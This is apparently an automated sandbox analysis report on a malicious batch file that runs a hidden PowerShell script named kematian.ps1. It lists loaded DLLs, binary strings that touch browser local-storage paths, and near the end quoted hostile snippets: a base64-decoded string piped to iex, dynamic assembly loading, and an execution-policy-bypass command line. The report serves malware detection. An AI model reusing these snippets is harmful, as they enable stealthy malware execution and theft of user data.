            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: avicap32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvfw32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: pirates.batStatic file information: File size 3787378 > 1048576
            Source: Binary string: lambda_methodNet.Http.pdb source: powershell.exe, 00000028.00000002.2902014674.0000017E80199000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: powershell.exe, 00000030.00000002.2347663937.000000C000498000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Net.Http.pdb2"{ source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: winload_prod.pdbacroNGLLog.txt source: powershell.exe, 00000030.00000002.2331375157.000000C0002C4000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbV_ source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ement.Automationp.pdby source: powershell.exe, 00000028.00000002.2914373114.0000017E803EC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ntkrnlmp.pdb source: powershell.exe, 00000030.00000002.2347720192.000000C0004AA000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2331375157.000000C000006000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: winload_prod.pdbDD2-7850-423A-B1D8-7882CE1A6D15.log source: powershell.exe, 00000030.00000002.2347720192.000000C0004AA000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000028.00000002.2909000081.0000017E802B9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Net.Http.pdb source: powershell.exe, 00000028.00000002.2916812846.0000017E804BB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: powershell.exe, 00000030.00000002.2331375157.000000C000136000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: powershell.exe, 00000030.00000002.2345550660.000000C00041E000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ws\dll\System.Management.Automation.pdb source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.pdbhP source: powershell.exe, 0000002C.00000002.2105443989.00000201CC1ED000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: grule230174v0.xmlrule230200v0.xmlrule700000v2.xmlrule700001v2.xmlrule700050v1.xmlrule700051v1.xmlrule700100v1.xmlrule700101v1.xmlrule700150v1.xmlrule700151v1.xmlrule700200v1.xmlrule700201v1.xmlrule700250v1.xmlrule700251v1.xmlrule700300v1.xmlrule700301v1.xmlrule700350v1.xmlrule700351v1.xmlrule700400v2.xmlrule700401v2.xmlrule700450v1.xmlrule700451v1.xmlrule700500v1.xmlrule700501v1.xmlrule700550v1.xmlrule700551v1.xmlrule700600v1.xmlrule700601v1.xmlrule700650v1.xmlrule700651v1.xmlrule700700v1.xmlrule700701v1.xmlC:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\Settings\C:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\Settings\C:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\TempStateC:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbweC:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\TempC:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppDataC:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbweC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\ACC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\SettingsC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\SettingsC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\SettingsC:\Users\user\AppData\Local\Packages\microsoft.windowscom
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: powershell.exe, 00000030.00000002.2331375157.000000C00007A000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbpX source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: powershell.exe, 00000030.00000002.2331375157.000000C000116000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000028.00000002.2913711365.0000017E803CB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Net.Http\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Net.Http.pdb~ source: powershell.exe, 00000028.00000002.2916812846.0000017E804A6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ws\dll\System.Management.Automation.pdb source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: $C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\TempC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AppDataC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbC:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logC:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.logr source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C0002FE000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Net.Http.pdbtract source: powershell.exe, 00000028.00000002.2913711365.0000017E803CB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: pingme.txtntkrnlmp.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C000006000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000028.00000002.2914373114.0000017E803EC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdboAqN:: source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: p.pdb source: powershell.exe, 0000002C.00000002.2215777823.00000201E2FED000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: edbtmp.logIndexedDB.edbIndexedDB.jfmAppIconCacheConstraintIndexFlighting100ShellFeeds308046B0AF4A39CBChromeMSEdgeApps.ftApps.ftApps.indexApps.indexApps.ftapps.csgApps.indexapps.schemaACappsglobals.txtappssynonyms.txtsettings.csgsettings.schemaSettings.ftSettings.indexSettings.ftSettings.indexGLEAM-DARK.svgGLEAM-LIGHT.svgroaming.locksettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryroaming.lockACsettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryACAppDataLocalCacheLocalStateRoamingStateSettingsTempACSystemAppDataTempStateINetCacheINetCookiesINetHistoryroaming.locksettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryMicrosoftcontainer.datESEcontainer.datCryptnetUrlCacheContentMetaDataroaming.lockACsettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryACAppDataLocalCacheLocalStateRoamingStateSettingsTempACSystemAppDataTempStateINetCacheINetCookiesINetHistoryAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryroaming.lockACsettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryroaming.lockACsettings.datroaming.locksettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryroaming.lockACsettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateACAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryINetCacheTempINetCookiesINetHistoryroaming.lockACsettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryHxStore.hxdACroaming.locksettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateACroaming.locksettings.datINetCacheTempINetCookiesINetHistoryEXCELpingme.txtntkrnlmp.pdbwinload_prod.pdbdownload.errorntkrnlmp.pdbReadFile source: powershell.exe, 00000030.00000002.2331375157.000000C000006000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbgAyN; source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: powershell.exe, 00000030.00000002.2331375157.000000C0002FE000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ings source: powershell.exe, 00000030.00000002.2633346989.000002A872B26000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Net.Http.pdbmt"i source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: n.pdbWF source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: winload_prod.pdbdownload.error source: powershell.exe, 00000030.00000002.2331375157.000000C000006000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: WINLOA~1.PDB3( source: powershell.exe, 00000030.00000002.2347720192.000000C0004AA000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\FontsC:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\LicensesC:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\C:\Users\user\AppData\Local\SolidDocumentsC:\Users\user\AppData\Local\Temp{03477411-EFD2-45F5-9977-8217BABEF128} - OProcSessId.dat{39FD46B1-FE63-43EB-8B40-445FD746DDBB} - OProcSessId.dat{68EB49F3-8C14-4F42-9AAA-8A4F03F41DF8} - OProcSessId.dat{6E005F86-FF04-4920-857F-6AD6E14B3DC3} - OProcSessId.dat{A3E94280-ADEA-4163-99A3-23DF2BB55BDB} - OProcSessId.datC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\C:\Users\user\AppData\Local\Temp\acrobat_sbx\Adobe\AcrobatC:\Users\user\AppData\Local\Temp\acrobat_sbx\Adobe\Acrobat\DCNGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-00-50-743.logNGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-01-22-078.logC:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeC:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\C:\Users\user\AppData\Local\Temporary Internet FilesC:\Users\user\AppData\Local\VirtualStoreC:\Users\user\AppData\Local\_curlrcC:\Users\user\AppData\Local\Google\Chrome\User Data\Default\C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\--09AZ__az--09AZ__az--09AZ__azdQw4w9WgXcQ:C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\--09AZ__az--09AZ__az--09AZ__azdQw4w9WgXcQ:nullHARDWARE_ACCELERATION_MODE_PREVIOUSVARIATIONS_FAILED_TO_FETCH_SEED_STREAKVARIATIONS_PERMANENT_CONSISTENCY_COUNTRYVARIATIONS_SAFE_SEED_PERMANENT_CONSISTENCY_COUNTRYVARIATIONS_SAFE_SEED_SESSION_CONSISTENCY_COUNTRY source: powershell.exe, 00000030.00000002.2345550660.000000C00041E000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\SettingsC:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\SystemAppDataC:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\TempStateC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\ACC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\BackgroundTransferApiC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\INetCacheC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\INetCookiesC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalCacheC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalStateC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\RoamingStateC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\roaming.lockC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.datC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.LOG1C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.LOG2C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\SystemAppDataC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\TempStateC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\AppDataC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalCacheC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalStateC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\RoamingStateC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\SettingsC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\roaming.lockC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.datC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\SystemAppDataC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\TempStateC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C0002FE000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.pdb source: powershell.exe, 0000002C.00000002.2105443989.00000201CC1ED000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly($name, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $module = $assembly.DefineDynamicModule('DynamicModule') $typeBuilder = $module.DefineType('PInvokeType', 'Publi
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("JGtlbWF0aWFuLlNldFZhbHVlKCRudWxsLCR0cnVlKQ==")) | &([regex]::Unescape("\u0069\u0065\u0078")) ([Reflection.Assembly]::LoadWithPartialName(('System.Core')).GetType(('System.Diagnost
            Suspicious powershell command line found
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file kematian.ps1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline"
